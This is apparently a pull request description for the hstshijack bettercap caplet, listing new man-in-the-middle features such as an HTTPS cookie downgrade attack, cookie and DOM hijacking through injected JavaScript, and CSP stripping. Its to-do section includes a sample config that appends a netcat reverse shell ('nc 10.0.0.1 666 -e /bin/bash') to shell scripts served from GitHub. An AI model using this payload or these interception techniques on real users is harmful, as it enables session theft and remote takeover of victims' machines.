Update hstshijack

[buffermet]

Depends on bettercap/bettercap#1195

Changes:

• Implemented cookie domain spoofing.
• Implemented cookie downgrade attack (for downgrading HTTPS).
• Implemented req/res body regex replacement JSON config file.
• Implemented req/res header regex replacement JSON config file.
• Implemented req URL regex replacement JSON config file.
• Implemented JS payloads regex replacement JSON config file (with obfuscation of obf_hstshijack_ prefixed strings).
• DOM spoofing is done with MutationObserver instead of a loop.
• hijack.js payload now hijacks document.cookie getter and setter.
• hijack.js payload now hijacks Element.innerHTML setter.
• hijack.js payload now hijacks Element.outerHTML setter.
• hijack.js payload now hijacks HTMLLinkElement.href setter.
• hijack.js payload now hijacks HTMLScriptElement.nonce setter.
• hijack.js payload now hijacks HTMLScriptElement.src setter.
• HTTP proxy module now spoofs preflight response headers.
• HTTP proxy module no longer hardcodes CSP headers, only removes them.
• DNS proxy module drops AAAA queries by default.
• Fixed bug in HTTP proxy module where HTTPS scheme was not properly restored in request headers for the requested hostname.
• Fixed bug where spaces were removed from file paths in environment variables.
• Fixed bug where Access-Control-Allow-Origin response header was incorrectly spoofed.
• Reduced a great deal of overhead in the HTTP proxy module by precompiling regex selectors where possible.
• Changed indentation from spaces to tabs.
• Cleaned up caplet folder structure.

To do:

• Improve res/req header & body spoofing by assembling string slices using match length and indices.
• Refactor res body spoofing so we can target every mimetype/extension/... from the res.Body.json config. Consider the following format:

[
    {
        "headers": ["Linux|Mac OS X", ""],
        "host": ["^raw[.]githubusercontent[.]com$", "i"],
        "path": ["[.]sh$", ""],
        "port": [],
        "query": [],
        "replacements": [
            ["$", "", "\nnohup nc 10.0.0.1 666 -e /bin/bash &>/dev/null"]
        ]
    }
]

• Implement configurable sync/async SSL discovery mechanism for requested hostnames that we don't know yet.
• Complete optionality of cookie downgrade attack in the DOM (hijack.js payload).
• Extend whitelisting to also stop sending spoofed DNS responses to whitelisted clients for whitelisted hostnames in DNS proxy module. Don't do this because it blocks the HTTPS redirect.
• Allow the option to set global variable names across multiple JS payloads that get obfuscated by the HTTP proxy module.
• For the amoeba extension integration we should have a run queue of HID and other DOM event instructions in their respective Window/DOM event listeners (e.g. load, DOMContentLoaded, etc.) to keep the DOM state in sync since the attacker's page won't finish loading at the same time as the victim's.

[steev]

Should this actually link to yours and not to the bettercap/caplets repo?